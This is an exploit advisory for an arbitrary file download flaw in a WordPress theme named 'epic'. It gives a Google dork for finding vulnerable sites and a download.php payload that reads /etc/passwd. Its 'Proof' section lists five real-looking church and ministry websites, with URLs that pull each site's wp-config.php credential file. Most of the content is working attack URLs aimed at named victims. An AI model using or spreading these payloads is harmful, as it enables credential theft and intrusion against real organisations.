|#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#|
|-------------------------------------------------------------------------|
|[*] Exploit Title: Wordpress epic theme Arbitrary File Download Vulnerability
|
|[*] Google Dork: inurl:wp-content/themes/epic
|
|[*] Date : Date: 2014-09-07
|
|[*] Exploit Author: Ashiyane Digital Security Team
|
|[*] Vendor Homepage : http://www.organizedthemes.com/epic
|
|[*] Tested on: Windows 7
|
|-------------------------------------------------------------------------|
|
|[*] Location :
[localhost]/wp-content/themes/epic/includes/download.php?file=/etc/passwd
|
|-------------------------------------------------------------------------|
|[*] Proof:
|
|[*]
http://www.lagunabaptist.org/wp-content/themes/epic/includes/download.php?file=/home/content/46/8992446/html/wp-config.php
|
|[*]
http://doveetown.org/wp-content/themes/epic/includes/download.php?file=/home/content/03/10398303/html/wp-config.php
|
|[*]
http://verdebaptist.com/wp/wp-content/themes/epic/includes/download.php?file=/home/content/44/2981244/html/wp/wp-config.php
|
|[*]
http://kespres.ca/wp-content/themes/epic/includes/download.php?file=/home/content/30/10806230/html/wp-config.php
|
|[*]
http://kimberlywilliamsministries.org/wp-content/themes/epic/includes/download.php?file=/home2/praise11/public_html/wp-config.php
|
|-------------------------------------------------------------------------|
|[*] Discovered By : ACC3SS
|-------------------------------------------------------------------------|
|-------------------------------------------------------------------------|
|#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#|